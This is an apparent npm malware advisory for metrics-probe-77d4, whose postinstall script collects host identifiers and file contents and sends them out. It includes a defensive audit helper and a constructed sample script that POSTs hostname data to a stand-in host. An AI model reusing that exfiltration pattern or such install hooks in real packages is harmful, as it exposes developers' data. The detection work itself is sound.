MAL-2026-5982

Malicious code in metrics-probe-77d4 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1d079b30dbb30db1a61acddcd094d2e7e67e7ef466d624e4ad2392edc9d9203e)

On install, package.json runs `postinstall: node run.js`. run.js imports os, fs, http, https, and child_process; at runtime it collects host identifiers (os.hostname(), os.platform()) and reads files from the filesystem (fs.existsSync / fs.readFileSync), then issues outbound HTTP/HTTPS requests, including POST calls (run.js lines 322 and 329) and GET / http.get fetches (lines 38 and 190). The postinstall lifecycle hook causes this code to execute automatically on `npm install` without any consumer interaction, exposing the installing host's identifiers and local file contents to attacker-controlled network destinations. The package name (random suffix `-77d4`) and the absence of any documented purpose are consistent with a disposable exfiltration lure rather than a legitimate library.
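The combination the source describes (an install-time lifecycle hook whose script fingerprints the host, reads local files and issues outbound requests) can be checked for mechanically before a package is trusted. The following audit helper is an added example, not code from the advisory or from the package; the package name, script text and indicator regexes are constructed here, and the caller is assumed to have read package.json and the hook script from `node_modules/<name>`.

```javascript
// Added example (not from the advisory): flag npm packages whose install hook
// runs a script that fingerprints the host, reads files and talks to the network,
// the combination this record describes. Names and script text are constructed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each indicator is a regex over the script source; a match is a hint, not proof.
const INDICATORS = {
  hostFingerprint: /\bos\.(hostname|platform|userInfo|networkInterfaces)\s*\(/,
  fileRead: /\bfs\.(readFileSync|readFile|existsSync)\s*\(/,
  network: /\bhttps?\.(request|get)\s*\(/,
  shellExec: /require\(\s*['"]child_process['"]\s*\)/,
};

// Script file a hook command would run, e.g. "node run.js" -> "run.js".
function hookScriptFile(command) {
  const m = /\bnode\s+([^\s&|;]+\.[cm]?js)\b/.exec(command || '');
  return m ? m[1] : null;
}

// pkg: parsed package.json object; sources: { filename: source text } read from
// the package directory (node_modules/<name>) by the caller.
function auditPackage(pkg, sources) {
  const scripts = pkg.scripts || {};
  const hooks = INSTALL_HOOKS.filter((h) => h in scripts).map((hook) => {
    const file = hookScriptFile(scripts[hook]);
    const src = (file && sources[file]) || '';
    const indicators = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(src));
    return { hook, file, indicators };
  });
  // Highest concern: an install hook whose script both fingerprints and phones home.
  const exfilLike = hooks.some(
    (h) => h.indicators.includes('hostFingerprint') && h.indicators.includes('network'));
  return { name: pkg.name, hooks, exfilLike };
}

// Constructed sample mirroring the advisory's description (not the real package).
const SAMPLE_PKG = { name: 'example-probe-0000', scripts: { postinstall: 'node run.js' } };
const SAMPLE_SOURCES = { 'run.js': [
  "const os = require('os'), fs = require('fs'), https = require('https');",
  "const info = { host: os.hostname(), platform: os.platform() };",
  "if (fs.existsSync('/etc/hostname')) info.f = fs.readFileSync('/etc/hostname', 'utf8');",
  "https.request({ host: 'example.invalid', method: 'POST' }).end(JSON.stringify(info));",
].join('\n') };

console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_SOURCES), null, 2));
```

A hit on `exfilLike` is a reason to inspect the hook script by hand, not a verdict; legitimate build steps do read files and a few do fetch prebuilt binaries, so the indicator list is what a reviewer would look at.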

Affected packages

npm / metrics-probe-77d4

No fixed version published yet for metrics-probe-77d4 (npm). Pin to a known-safe version or switch to an alternative.